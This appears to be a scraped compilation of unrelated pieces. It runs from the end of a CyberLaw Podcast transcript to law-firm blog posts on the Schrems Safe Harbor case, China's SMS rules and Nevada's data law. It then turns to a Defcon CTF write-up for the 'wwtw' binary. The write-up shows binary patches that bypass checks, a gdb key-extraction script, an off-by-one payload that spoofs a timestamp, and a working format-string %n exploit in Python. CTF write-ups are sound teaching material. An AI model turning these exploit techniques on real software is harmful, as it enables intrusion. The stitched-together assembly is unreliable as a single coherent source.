We actually ran the test from a little bit in July all the way through September, and we watched this one campaign: 40 percent fraud; then, when we said we were going to start, three percent fraud; then, when we said we were done, back to 40. You just had this square wave. It was the most beautiful demo. We showed this to the customer – one of the biggest brands in the country – and they were just like, “Those guys did what?”

And here’s what’s great – for my entire career I’ve been dealing with how people break in. This bug, that bug, what’s wrong with Flash, what’s wrong with Java. This is the first time in my life I’ve been dealing with why. People are doing this fraud to make money. Let’s stop the checks from being written. It’s been incredibly entertaining.

Stewart: Oh, that it is; that’s very cool. And maybe this is the observation: we wasted so much time hopelessly trying to keep people out of systems; now everybody says, “Oh, you have to assume they’re in,” but that doesn’t mean you have the tools to really deal with them, and this is a tool to deal with people when they’re in.

Dan: There’s been a major shift from prevention to detection. We basically say, “Look, okay, they’re going to get in but they don’t necessarily know what perfectly to do once they’re in.” Their actions are fundamentally different than your legitimate users and they’re always going to be because they’re trying to do different things; so if you can detect properties of the different things that they’re doing you actually have signals, and it always comes down to signals in intelligence.

Stewart: Yeah; that’s right. I’m looking forward to NSA deploying WhiteOps technology, but I won’t ask you to respond to that one. Okay, Dan, this was terrific, I have to say. I’d rather be on your side of an argument than against you, but it’s been a real pleasure arguing this out. Thanks for coming in, Michael, Jason; I appreciate it.

Just to close up: the CyberLaw Podcast is open to feedback. Send comments to cyberlawpodcast@steptoe.com, or leave a message at 202 862 5785. I’m still waiting for an entertainingly abusive voicemail; we haven’t gotten one yet. This has been episode 70 of the Steptoe CyberLaw Podcast, brought to you by Steptoe & Johnson. Next week we’re going to be joined by Catherine Lotrionte, the Associate Director of the Institute for Law, Science and Global Security at Georgetown. And coming soon we’re going to have Jim Baker, the General Counsel of the FBI, and Rob Knake, a Senior Fellow for Cyber Policy at the Council on Foreign Relations. We hope you’ll join us next week as we once again provide insights into the latest events in technology, security, privacy and government.

Europe’s Highest Court Delays Decision in Safe Harbor Case Schrems vs. Facebook

On June 9, 2015, Max Schrems tweeted that the Advocate General of the European Court of Justice (“ECJ”) would delay his opinion in Europe v. Facebook, a case challenging the U.S.-EU Safe Harbor Framework. The opinion previously was scheduled to be issued on June 24. No new date has been set.

The delay may allow the U.S. and EU to conclude their negotiations regarding updating the Safe Harbor Framework before the ECJ issues an opinion that could impact the Framework. According to reports, although certain issues concerning the national security exemptions to the U.S.-EU Safe Harbor Framework still need to be resolved, the negotiations are expected to be concluded within weeks.

In his case against Facebook, Austrian law student Max Schrems challenges the Irish Data Protection Commissioner’s claim that the Safe Harbor agreement precluded the agency from stopping data transfers from Ireland to the U.S. by Facebook, which participates in the Safe Harbor. Schrems’ case was prompted by the Snowden revelations about U.S. national security authorities accessing personal data of EU citizens transferred to the U.S. via the Safe Harbor Framework. Schrems is seeking the end of the U.S.-EU Safe Harbor Framework.

Hunton Authors Bloomberg BNA Portfolio on Cybersecurity

Hunton & Williams LLP’s Global Privacy and Cybersecurity practice group has written a portfolio for Bloomberg BNA on information security and data breach issues in the United States and globally. Cybersecurity and Data Breach offers a broad overview of relevant legal requirements in the United States, European Union and select countries around the world. The portfolio includes practical guidance and advice on managing a data security breach, from managing an investigation and conducting remediation to providing notification to affected individuals, regulators, consumer reporting agencies, employees, boards of directors and the public. It also provides details on proactive cyber readiness activities such as preparing an Incident Response Plan, conducting tabletop exercises, and developing a vendor and employee management program. Cybersecurity and Data Breach is available at Bloomberg BNA’s Privacy & Data Security Law Resource Center and also at Bloomberg Law.

“Companies spend millions of dollars rebuilding their brand and retaining customers after suffering a data breach,” said Lisa Sotto, chair of Hunton & Williams’ global privacy and cybersecurity practice. Aaron Simpson, partner in the firm’s Global Privacy and Cybersecurity practice, added, “The number of cyber attacks continues to rise at an unprecedented rate, and companies need to prepare. Data breaches are inevitable, but preparation can mitigate the harm.”

Hunton & Williams’ Global Privacy and Cybersecurity practice helps companies manage data at every step of the information life cycle. The firm has been ranked as a top law firm for privacy and data security by Chambers and Partners and The Legal 500. Computerworld magazine recognized Hunton & Williams as the best global privacy advisor in each of its four surveys. Hunton & Williams also was selected for a Fortune 50 client’s 2013 Law Firm Award for its privacy work, noting that the privacy team’s “laser focus on the issues resulted in a flawless execution.”

China’s Ministry of Industry and Information Technology Publishes Rules Governing Use of Text Messaging

On May 19, 2015, China’s Ministry of Industry and Information Technology promulgated its Provisions on the Administration of Short Messaging Services (the “Provisions”), which will take effect on June 30, 2015.

Designed to combat improper texting practices such as junk short messages, the Provisions were adopted under the July 2014 People’s Republic of China (“P.R.C.”) Telecommunications Rules (“2014 Revision”) and the December 2012 Resolution of the Standing Committee of the National People’s Congress Relating to Strengthening the Protection of Information on the Internet, for purposes of (1) normalizing conduct related to short messaging services (“SMS”), (2) protecting the lawful interests of users, and (3) promoting the sound development of a market for SMS.

The Provisions are important in several ways. First, they establish certain basic operating requirements which SMS providers must observe in their text messaging campaigns. Under these requirements:

  • SMS providers must hold a telecommunications enterprise license;
  • when SMS providers charge user fees, the charges must be made in accordance with applicable laws, regulations and standards;
  • SMS providers must maintain records of the times of transmission, user receipts and when a user unsubscribes; and
  • SMS providers must not use SMS systems to circulate or broadcast illicit content.

Second, the Provisions establish more detailed rules (for example, compared to the earlier amendment to the P.R.C Law on the Protection of the Interests of Consumers or its implementing measures published on January 5, 2015) on the manner in which text messages may be sent to consumers. Under the Provisions’ rules:

  • SMS providers and short messaging content providers must not send commercially-purposed text messages to end users without their consent or request;

  • when end users provide their consent, the type, frequency and duration of the planned broadcast campaign must be made clear;
  • commercially-purposed text messages must not be sent to certain (non-commercially oriented) ports;
  • commercially-purposed text messages must include an expedient and effective method for unsubscribing; and
  • SMS providers must establish a system for supervising text messages, and an early warning and monitoring mechanism.

In addition to the foregoing rulemaking, the Provisions establish practical channels by which consumer interests could be protected. These include:

  • The Provisions establish a system by which consumers can make complaints and file reports. They establish a reporting and handling center under the auspices of the Ministry of Industry and Information Technology, through which reports of “nasty” (不良) or junk short messages can be processed. They also clarify procedures under which infringements and violations involving text messages can be handled, and under which punishments can be meted out.
  • The Provisions strengthen the oversight and inspection system. They clarify the authority and duty of the regulatory authority to carry out oversight and inspection, and the corresponding duties of SMS providers.
  • The Provisions establish penalties for unlawful behavior among SMS providers, short messaging content providers, personnel of the supervisory authority, and personnel of the reporting and handling center. Violations are subject to being recorded in a permanent file, and responsible persons may be subject to “supervisory discussion.”

Apart from regulating conventional SMS, the Provisions also extend to information delivery services similar to SMS that use the Internet. Article 38 of the Provisions provides that delivery services which send information having the characteristics of a short message (for example, text, data, voice or images) to fixed telephones, mobile telephones and other communications end-users, via the Internet, shall be conducted with reference to the Provisions.

By their terms, the Provisions only affect the use and transmission of text messages. This makes them rather specific in their scope and impact. The Provisions have, however, the potential to materially increase operational requirements for those companies which rely on the use of text messages. They also clarify how such companies may be held accountable.

In the abstract, the Provisions are a particularly fine-grained illustration of China’s ongoing reliance on a sector-by-sector approach to the development of its regulatory framework on personal information.

Nevada Expands Definition of Personal Information

On May 13, 2015, Nevada Governor Brian Sandoval (R-NV) signed into law A.B. 179 (the “Bill”), which expands the definition of “personal information” in the state’s data security law. The law takes effect on July 1, 2015. Under the Bill, personal information now includes:

  • a “user name, unique identifier or electronic mail address in combination with a password, access code, or security question and answer that would permit access to an online account;”
  • a medical identification or health insurance identification number; and
  • a driver authorization card number.

In addition, although Nevada’s data security law previously excluded “publicly available information ... lawfully made available to the general public” from the definition of personal information, the Bill narrows the scope of that exclusion, limiting it to information available “from federal, state or local governmental records.”

View the text of the Bill.

Defcon quals: wwtw (a series of vulns)

Hey folks,

This is going to be my final (and somewhat late) writeup for the Defcon Qualification CTF. The level was called "wibbly-wobbly-timey-wimey", or "wwtw", and was a combination of a few things (at least the way I solved it): programming, reverse engineering, logic bugs, format-string vulnerabilities, some return-oriented programming (for my solution), and Dr. Who references!

I'm not going to spend much time on the theory of format-string vulnerabilities or return-oriented programming because I just covered them in babyecho and r0pbaby.

And by the way, I'll be building the solution in Python as we go, because the first part was solved by one of my teammates, and he's a Python guy. As much as I hated working with Python (which has become my life lately), I didn't want to re-write the first part and it was too complex to do on the shell, so I sucked it up and used his code.

You can download the binary here, and you can get the exploit and other files involved on my github page.

Part 1: The game

The first part's a bit of a game. I wasn't all that interested in solving it, so I patched it out (see the next section) and discovered that there was another challenge I could work on while my teammate solved the game. This is going to be a very brief overview of my teammate's solution.

When you start wwtw, you will see this:

You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
   012345678901234567890
00        <
01
02  A
03
04            A
05
06                AA
07    A        A
08 A
09
10  A     A
11                  A
12                 A
13
14                    A
15    A
16 A   A              E
17
18                A
19  A
Your move (w,a,s,d,q):

After a few seconds, it times out. The timeout can be patched out, if you want, but the timeouts are actually somewhat important in this level as we'll see later.

You can move around your character using the w,a,s,d keys, as indicated in the little message. Your goal is to reach the Tardis - represented by a 'T' - by going through the exits - represented by 'E's - and avoiding the angels - represented by 'A's. The angels will follow you when your back is turned. This stuff is, of course, a Dr. Who reference. :)

The solution to this was actually pretty straightforward: a greedy algorithm that makes the "best" move toward the exit, to a square that isn't occupied by an angel, works 9 times out of 10, so we stuck with that and re-ran it whenever we got stuck in a corner or along the wall.
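In rough Python, the greedy step looks something like this (my sketch, not the actual exploit code; parsing the board and talking to the process are assumed to happen elsewhere):

MOVES = {"w": (0, -1), "a": (-1, 0), "s": (0, 1), "d": (1, 0)}

def best_move(me, exit_pos, angels):
    # Manhattan distance is good enough on a grid with 4-way movement
    def dist(p, q):
        return abs(p[0] - q[0]) + abs(p[1] - q[1])

    candidates = []
    for key, (dx, dy) in MOVES.items():
        nxt = (me[0] + dx, me[1] + dy)
        if nxt in angels:
            continue  # never step onto an angel
        candidates.append((dist(nxt, exit_pos), key))
    return min(candidates)[1]  # greedy: whichever move lands closest to the exit

If every neighboring square is blocked (the stuck-in-a-corner case), candidates is empty and this throws, which is more or less the point where we'd just re-run the solver anyway.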

You can see the code for it in the exploit. I'm not going to dwell on that part any longer.

Part 1b: skipping the game

As I said, I didn't want to deal with solving the game; I wanted to get to the good stuff (so to speak), so I "fixed" the game such that every move would appear to be a move to the exit (it would be possible to skip the game part entirely, but this was easy and worked well enough).

This took a little bit of trial and error, but I primarily used the failure message - "Enjoy 1960..." - to figure out where in the binary to look.

If you look at all the places that string is found (in IDA, use shift-f12 or just search for it), you'll find one that looks like this:

.text:00002E14          lea     eax, (aEnjoy1960____0 - 5000h)[ebx] ; "Enjoy 1960..."

If you look back a little bit, you'll find that the only way to get to that line is for this conditional jump to occur:

.text:00002DC0 83 7D F4 01                             cmp     [ebp+var_C], 1
.text:00002DC4 75 48                                   jnz     short loc_2E0E

It's pretty easy to fix that: simply replace the jnz - 75 48 - with nops - 90 90. Here's a diff:

--- a   2015-06-03 17:09:22.000000000 -0700
+++ b   2015-06-03 17:09:44.000000000 -0700
@@ -3635,7 +3635,8 @@
     2db8:      e8 7f ed ff ff          call   1b3c <main+0x937>
     2dbd:      89 45 f4                mov    %eax,-0xc(%ebp)
     2dc0:      83 7d f4 01             cmpl   $0x1,-0xc(%ebp)
-    2dc4:      75 48                   jne    2e0e <main+0x1c09>
+    2dc4:      90                      nop
+    2dc5:      90                      nop
     2dc6:      8d 83 e0 00 00 00       lea    0xe0(%ebx),%eax
     2dcc:      8b 00                   mov    (%eax),%eax
     2dce:      83 f8 03                cmp    $0x3,%eax
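If you'd rather script the patch than use a hex editor, here's a quick Python sketch (it assumes, as the diff suggests, that the file offset of the jnz matches the 0x2dc4 address; the input/output filenames are mine):

with open("wwtw", "rb") as f:
    data = bytearray(f.read())

assert data[0x2DC4:0x2DC6] == b"\x75\x48"  # jnz short loc_2E0E
data[0x2DC4:0x2DC6] = b"\x90\x90"          # two nops: every move "reaches the exit"

with open("wwtw-patched", "wb") as f:
    f.write(data)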

Aside: Making the binary debug-able

Just as a quick aside: this program is a PIE - position independent executable - which means the addresses you see in IDA are all relative to 0. But when you run the program, it's assigned a "proper" address, even if ASLR is off. I don't know if there's a canonical way to deal with that, but I personally use this little trick in addition to turning off ASLR:

  1. Replace the first instruction in the start() or main() function with "\xcc" (a software breakpoint), plus enough nop instructions to overwrite exactly one instruction
  2. Run it in a debugger such as gdb
  3. (Optionally) use a .gdbinit file that automatically resumes execution when the breakpoint is hit

Here's the first line of start() in wwtw:

.text:00000A60 31 ED                                   xor     ebp, ebp

Since it's a two byte instruction ("\x31\xED"), we open the binary in a hex editor and replace those two bytes with "\xcc\x90" (the "\x90" being a nop instruction). If you try to execute it after that change, you should see this if you did it right:

$ ./wwtw-blog
Trace/breakpoint trap
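The same byte-patching sketch from earlier works here too, if you don't feel like hex editing (0xA60 is the IDA address of start(); I'm assuming the file offset matches, as before):

with open("wwtw", "rb") as f:
    data = bytearray(f.read())

assert data[0xA60:0xA62] == b"\x31\xED"  # xor ebp, ebp
data[0xA60:0xA62] = b"\xCC\x90"          # int3 + nop

with open("wwtw-blog", "wb") as f:
    f.write(data)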

And with a debugger, you can continue execution after that breakpoint:

$ gdb -q ./wwtw-blog
(gdb) run
Starting program: /home/ron/defcon-quals/wwtw/wwtw-blog

Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
(gdb) cont
Continuing.
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
[...]

You can also use a gdbinit file:

$ echo -e 'run\ncont' > gdbhax
$ gdb -q -x ./gdbhax ./wwtw-blog
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!
[...]

Part 2: Starting the ignition (by debugging)

After you complete the fifth room and get to the Tardis, you're prompted for a key:

TARDIS KEY: abcd
Wrong key!
Enjoy 1960...
$ bcd

Funny story: I had initially nop'd out the failure condition when I was trying to nop out the "you've been eaten by an angel" code from earlier, so it actually took me a while to even realize that this was a challenge. I had accidentally set it to - as I describe in the next section - accept any password. :)

Anyway, one thing you'll notice is that when it prompts you for the key, you can type in multiple characters, but after it kicks you out it prints all but the first character on the commandline. That's interesting, because it means that it's only consuming one character at a time and is therefore vulnerable to a bunch of attacks. If you happen to guess a correct character, it consumes one more:

TARDIS KEY: Uabcd
Wrong key!
Enjoy 1960...
$ bcd

(Note that it consumed both the "U" and the "a" this time)

Because it's checking one character at a time, it's pretty easy to guess it one character at a time - 62 max tries per character (31 on average) and a 10-character string means it could be guessed in something like 600 - 1000 runs. But we can do better than that!

I searched the binary in IDA for the string "TARDIS KEY:" to get an idea of where to look for the code. You will find it at 0x00000ED1, which is in a fairly short function called from main(). In it, you'll see a call to both read() and getchar(). But more importantly, in the whole function there's only one "cmp" instruction that takes two registers (as opposed to a register and an immediate value, i.e., a constant):

.text:00000F45 39 C2                                   cmp     edx, eax

If I had to take a wild guess, I'd say that this function somehow verifies the password you type in using that comparison. And if we're lucky, it'll be a comparison between what we typed and what they expected to see (it doesn't always work out that way, but when it does, it's awesome).

To set a breakpoint, we need to know which address to break at. The easiest way to do that is to disable ASLR and just have a look at what address stuff loads to. It shouldn't change if ASLR is off.

On my machine, wwtw loads to 0x56555000, which means that comparison should be at 0x56555000 + 0x00000f45 = 0x56555f45. We can verify in gdb:

(gdb) x/i 0x56555f45
   0x56555f45:  cmp    edx,eax

We want to put a breakpoint there and print out both of those values to make sure that one is what we typed and the other isn't. I added the breakpoint to my gdbhax file because I know I'm going to be using it over and over:

$ cat gdbhax
run
b *0x56555f45
cont

And run the process (punching in whatever you want for the five moves, since we've already "fixed" the game):

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
Program received signal SIGTRAP, Trace/breakpoint trap.
0x56555a61 in ?? ()
Breakpoint 1 at 0x56555f45
You(^V<>) must find your way to the TARDIS(T) by avoiding the angels(A).
Go through the exits(E) to get to the next room and continue your search.
But, most importantly, don't blink!

[...]

TARDIS KEY: a

Breakpoint 1, 0x56555f45 in ?? ()
(gdb)
(gdb) print/c $edx
$2 = 65 'a'
(gdb) print/c $eax
$3 = 85 'U'
(gdb)

It's comparing the first character we typed ("a") to another character ("U"). Awesome! Now we know that at that comparison, the proper character is in $eax, so we can add that to our gdbhax file:

$ cat gdbhax
run
b *0x56555f45

cont

while 1
  print/c $eax
  cont
end

That little script basically sets a breakpoint on the comparison, then each time it breaks it prints eax and continues execution.

When you run it a second time, we start with "U" and then whatever other character so we can get the second character:

$ gdb -q -x ./gdbhax ./wwtw-blog
[...]
TARDIS KEY: Ua

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'
Wrong key!

Then run it again with "Ue" at the start:

Breakpoint 1, 0x56555f45 in ?? ()
$1 = 85 'U'

Breakpoint 1, 0x56555f45 in ?? ()
$2 = 101 'e'

Breakpoint 1, 0x56555f45 in ?? ()
$3 = 83 'S'

...and so on. Eventually, you'll get the key "UeSlhCAGEp". If you try it, you'll see it works:

TARDIS KEY: UeSlhCAGEp
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
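If you get tired of re-running gdb and extending the prefix by hand, the loop automates nicely. Here's a sketch using pexpect; the prompts and the regex are my reconstruction from the transcripts above, and it assumes the patched binary (any move reaches the exit) plus the gdbhax script:

import re
import pexpect

key = ""
while len(key) < 10:
    gdb = pexpect.spawn("gdb -q -x ./gdbhax ./wwtw-blog", encoding="utf-8")
    for _ in range(5):  # five rooms; with the patch, any move exits
        gdb.expect(r"Your move \(w,a,s,d,q\):")
        gdb.sendline("w")
    gdb.expect("TARDIS KEY:")
    gdb.sendline(key + "a")  # known prefix plus one dummy guess
    gdb.expect("Wrong key!")
    # gdbhax printed one "$N = <num> '<char>'" line per breakpoint hit
    chars = re.findall(r"\$\d+ = \d+ '(.)'", gdb.before)
    key += chars[len(key)]  # the comparison we failed reveals the next character
    gdb.close()
    print(key)

(If the dummy guess ever happens to be right for the last character, the expect on "Wrong key!" will time out; tweak as needed. It's a sketch, not production code.)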

Part 2b: Without brute force

Usually in CTFs, if a password or key is English-looking text, it's probably hardcoded, and if it's random looking, it's generated. Since that key was obviously not English, it stands to reason that it's probably generated and therefore would not work against the real service. At this point, my teammate hadn't solved the "game" part yet, so I couldn't easily test against the real server. Instead, I decided to dig a bit deeper to see how the key was actually generated. Spoiler: it doesn't actually change, so this wound up being unnecessary. There's a reason I take a long time to solve these levels. :)

At the start of the function that references the "TARDIS KEY:" string (the function contains, but doesn't start at, address 0x00000ED1), you'll see this line:

.text:00000EEF        lea     eax, (check_key - 5000h)[ebx]

Later, that variable is read, one byte at a time:

.text:00000EFA top_loop:                               ; CODE XREF: check_key+A4j
.text:00000EFA                 mov     eax, [ebp+key_thing]
.text:00000EFD                 movzx   eax, byte ptr [eax]
.text:00000F00                 movsx   eax, al
.text:00000F03                 and     eax, 7Fh
.text:00000F06                 mov     [esp], eax      ; int
.text:00000F09                 call    _isalnum

At each point, it reads the next byte, ANDs it with 0x7F (clearing the uppermost bit), and calls isalnum() on it to see if it's a letter or a number. If it's a valid letter or number, it's considered part of the key; if not, it's skipped.

It took me far too long to see what was going on: the function I called check_key() actually references itself and reads its own code! It reads the first dozen or so bytes from the function's binary and compares the alpha-numeric values to the key that was typed in.

To put it another way: if you look at the start of the function in a hex editor, you'll see:

55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41...

If we AND each of these values by 0x7F and convert them to a character, we get:

1.9.3-p392 :004 > "55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41".split(" ").each do |i|
1.9.3-p392 :005 >     puts (i.to_i(16) & 0x7F).chr
1.9.3-p392 :006?>   end
U

e
S

l
$
h
\
{



C
<
A

If you exclude the values that aren't alphanumeric, you can see that the first 16 bytes become "UeSlhCA", which is the first part of the code to start the engine!
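
Here's the same derivation as a quick Python sketch of the logic above, using the hex dump as input:

code = "55 89 E5 53 83 EC 24 E8 DC FB FF FF 81 C3 3C 41"
key = ""
for b in code.split(" "):
    c = chr(int(b, 16) & 0x7F)  # clear the top bit, like the "and eax, 7Fh"
    if c.isalnum():             # same filter as the isalnum() call
        key += c
print key                       # => "UeSlhCA"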

Satisfied that it wasn't random, I moved on.

Aside: Why did they use the function as the key?

Just a quick little note in case you're wondering why the function used itself to generate the password...

When you set a software breakpoint (by far the most common type of breakpoint), the debugger overwrites the first byte of the target instruction with an int3 opcode ("\xcc") behind the scenes. After it breaks, the original byte is briefly restored so the program can continue.

If you break on the first line of the function, then instead of the first byte of the function being "\x55", which is "push ebp", it's "\xCC", and therefore the derived value will be wrong. In fact, putting a breakpoint anywhere in the first ~20 bytes of that function will cause your passcode to be wrong.

I suspect that this was used as a subtle anti-debugging technique.
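If you do need a breakpoint in that range, a hardware breakpoint should sidestep the trick, since it uses the CPU's debug registers instead of patching code bytes:

(gdb) hbreak *0x56555f45
Hardware assisted breakpoint 1 at 0x56555f45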

Part 2c: Skipping the password check

Much like the game, I didn't want to have to deal with entering the password each time around, so I found the spot where the result of the password check is tested:

.text:0000125E                 test    eax, eax
.text:00001260                 jz      short loc_129C
.text:00001262                 lea     eax, (aWrongKey - 5000h)[ebx] ; "Wrong key!"

And switched the jz ("\x74\x3a") to a jmp ("\xeb\x3a"). Once you've done that, you can type whatever you want (including nothing) for the key.
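
If you'd rather script the patch than hex-edit by hand, here's a quick sketch (this wasn't part of my original process, and it assumes the test/jz byte pair is unique in the file):

data = open("./wwtw-blog", "rb").read()
sig = "\x85\xc0\x74\x3a"  # test eax,eax / jz short loc_129C
assert data.count(sig) == 1, "signature not unique - patch by offset instead"
off = data.index(sig)
open("./wwtw-blog-nokey", "wb").write(data[:off+2] + "\xeb" + data[off+3:])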

Part 3: Time travelling

Now that you've started the TARDIS, there's another challenge: you can only turn on the console during certain times:

Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
Access denied except between May 17 2015 23:59:40 GMT and May 18 2015 00:00:00 GMT

Looking around in IDA, I see some odd stuff happening. For example, the program attempts to connect to localhost on a weird port and read some data from it! The function that does that is called sub_CB0() if you want to have a look. After it connects, it sets up an alarm() that calls sub_E08() every 2 seconds. In that function, it reads 4 bytes from the socket and stores them. Those 4 bytes turned out to be a timestamp.

Basically, it has a little timeserver running on localhost that sends it the current time. If we can make it use a different server, we can provide a custom timestamp and bypass this check. But how?

I played around quite a bit with this, but I didn't make any breakthroughs until I ran it in strace.

To run the program under strace, we no longer need the debugger, so we have to restore the first two bytes of start() to their original values:

.text:00000A60 31 ED                                   xor     ebp, ebp

and run strace on it to see what's going on:

socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 3
setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "\0\0\0\0\350\3\0\0", 8) = 0
connect(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
write(3, "\0", 1)                       = 1
read(3, 0xffffcd88, 4)                  = -1 ECONNREFUSED (Connection refused)
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(3, "\0", 1)                       = 1
read(3, 0xffffc6d8, 4)                  = -1 ECONNREFUSED (Connection refused)
alarm(2)                                = 0
sigreturn() (mask [])                   = 3
read(0, 0x5655a0b0, 9)                  = ? ERESTARTSYS (To be restarted if SA_RESTART is set)
[...]

Basically, it makes the connection and gets a socket numbered 3, then reads a timestamp from that socket every 2 seconds. One of the first things I often do while working on CTF challenges is disable alarm() calls, but in this case the alarm was actually needed! I suspected this was another anti-debugging measure - to catch people who disable alarm() - and that the vulnerability was therefore hiding in the callback function.
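
As an aside, the strace output gives us enough to stand up a fake timeserver for local testing - a minimal sketch, assuming the binary just wants a raw 4-byte little-endian timestamp in response to each ping byte (the byte order is confirmed by the exploit timestamp below):

import socket, struct, time

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("127.0.0.1", 1234))
while True:
    ping, addr = s.recvfrom(1)  # the client writes a single "\0"
    s.sendto(struct.pack("<I", int(time.time())), addr)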

It turns out there wasn't really that much code, but the vulnerability was somewhat subtle and I didn't notice until I ran it in strace and typed a bunch of "A"s:

read(0, AAAAAAAAAAAAAAAAAAAAAAAA
"AAAAAAAAA", 9)                 = 9
write(1, "Invalid\n", 8Invalid
)                = 8
[...]
--- SIGALRM {si_signo=SIGALRM, si_code=SI_KERNEL, si_value={int=111, ptr=0x6f}} ---
write(65, "\0", 1)                      = -1 EBADF (Bad file descriptor)
read(65, 0xffffc6d8, 4)                 = -1 EBADF (Bad file descriptor)
alarm(2)                                = 0
[...]

When I put a bunch of "A"s into the prompt, it started reading from socket 65 (aka, 0x41 or "A") instead of from socket 3! There's an off-by-one vulnerability that allows you to change the socket identifier!

If you were to use "AAAAAAAA\0", it would overwrite the socket with a NUL byte, and instead of reading from socket 3 or 65, it would read from socket 0 - stdin. The very same socket we're already sending data to!

Here's the python code to exploit this:

sys.stdout.write("01234567\0")
sys.stdout.flush()

time.sleep(2) # Has to be at least 2

sys.stdout.write("\x6d\x2b\x59\x55")
sys.stdout.flush()

That hex value is a timestamp during the prescribed time. When it reads that from stdin rather than from the socket it opened, it thinks the time is right and we can then activate the TARDIS!
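
You can sanity-check that value yourself:

import struct, time

t = struct.unpack("<I", "\x6d\x2b\x59\x55")[0]
print t, time.strftime("%b %d %Y %H:%M:%S GMT", time.gmtime(t))
# 1431907181 May 17 2015 23:59:41 GMT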

Part 3b: Skipping the timestamp check

Once again, in the interest of being able to test without waiting 2 seconds every time, we can disable the timestamp check altogether. To do that, we find the error message:

.text:00001409  lea     eax, (aAccessDeniedEx - 5000h)[ebx] ; "Access denied except between %s and %s\"...

...and look backwards a little bit to find the jump that gets you there:

.text:000013BE E8 45 FA FF FF      call    check_timestamp
.text:000013C3 85 C0               test    eax, eax
.text:000013C5 74 2F               jz      short loc_13F6
.text:000013C7 8D 83 22 E1 FF FF   lea     eax, (aTheTardisConso - 5000h)[ebx] ; "The TARDIS console is online!"

And make sure it never happens (by replacing "\x74\x2F" with "\x90\x90", i.e., two NOPs). Now we can jump directly to pressing "1" to activate the TARDIS and it'll come right online:

$ ./wwtw-blog-nodebug
[...]
Welcome to the TARDIS!
Your options are:
1. Turn on the console
2. Leave the TARDIS
Selection: 1
The TARDIS console is online!Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection:

Part 4: Getting the coordinates

When we select option 3, we're prompted for coordinates:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 1,2
1.000000, 2.000000
You safely travel to coordinates 1,2

If you look at the function that contains the "You safely travel..." string, you'll see that one of three things can happen:

  • It prints "Invalid coordinates" if you put anything other than two numbers (as defined by strtof() returning with no error, which means we can put a number then text without being "caught")
  • It prints "You safely travel to coordinates [...]" if you put valid coordinates
  • It prints "XXX is occupied by another TARDIS" if some particular set of coordinates are entered

The "XXX" in the output is actually the coordinates the user typed, as a string, passed directly to printf(). And we remember why printf(user_string) is bad, right? (Hint: format string attacks)

The function to calculate the coordinates used a bunch of floating point math, which made me sad - I don't really know how to reverse floating point stuff, and I don't really want to learn in the middle of a level. Fortunately, I noticed that two global variables were used:

.text:0000112B                 fld     ds:(dbl_3170 - 5000h)[ebx]
[...]
.text:00001153                 fld     ds:(dbl_3178 - 5000h)[ebx]

And if you look at the variables, you'll see:

.rodata:00003170 dbl_3170        dq 51.492137            ; DATA XREF: do_jump_EXPLOITME+104r
.rodata:00003170                                         ; do_jump_EXPLOITME+11Ar
.rodata:00003178 dbl_3178        dq -0.192878            ; DATA XREF: do_jump_EXPLOITME+12Cr
.rodata:00003178                                         ; do_jump_EXPLOITME+13Er

So that's kind of a freebie. If we enter them, it works:

Your options are:
1. Turn on the console
2. Leave the TARDIS
3. Dematerialize
Selection: 3
Coordinates: 51.492137,-0.192878
51.492137, -0.192878
Coordinate 51.492137,-0.192878 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

And, to finish it off, let's verify that there is indeed a format-string vulnerability there:

Coordinates: 51.492137,-0.192878 %x %x %x
51.492137, -0.192878
Coordinate 51.492137,-0.192878 58601366 4049befe ef0f16f4 is occupied by another TARDIS.  Materializing there would rip a hole in time and space. Choose again.

Coordinates: 51.492137,-0.192878 %n
51.492137, -0.192878
Segmentation fault

Yup! :)

Part 4b: Format string exploit

I'm not going to spend any time explaining what a format string vulnerability is. If you aren't familiar, check out my last blog.

Instead, we're going to look at how I exploited this one. :)

The cool thing about this is, as you can see in the last example, if you enter "collision" coordinates (i.e., the ones that trigger the format string vulnerability), the function doesn't actually return; it just prompts again. The function doesn't return until you enter valid-looking coordinates (like 1,1).

That's really handy, because it means we can exploit it over and over before letting it return. Instead of the crazy math we had to do in the earlier level, we can just write one byte at a time. And speaking of the last level, I actually solved this level before babyecho, so I didn't have the handy format-string generator that I wrote.

write_byte()

I wrote a function in python that will write a single byte to a chosen address:

import struct
import sys

def write_byte(addr, value):
    # The 20-char coordinate prefix plus the 4-byte packed address print 24
    # bytes, so pad until the total count's low byte equals the target value.
    s = "51.492137,-0.192878 " + struct.pack("<I", addr)
    s += "%" + str(value + 256 - 24) + "x%20$n\n"

    print s
    sys.stdout.flush()
    sys.stdin.readline()

Basically, it uses the classic "AAAA%NNx%MM$n" string, which we saw a whole bunch in babyecho, where:

  • AAAA = the address as a 4-byte string (which will be the address written to by the %n)
  • NN = the number of bytes to waste to ensure that %n writes the proper value to AAAA (keeping in mind that the coordinates and address take up 24 bytes already)
  • MM = the number of elements on the stack before the format string reads itself (we can figure that out by bruteforce then hardcode it)

If that doesn't make sense, read the last blog - this is exactly the same attack (except simpler, because we only have to write a single byte).
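
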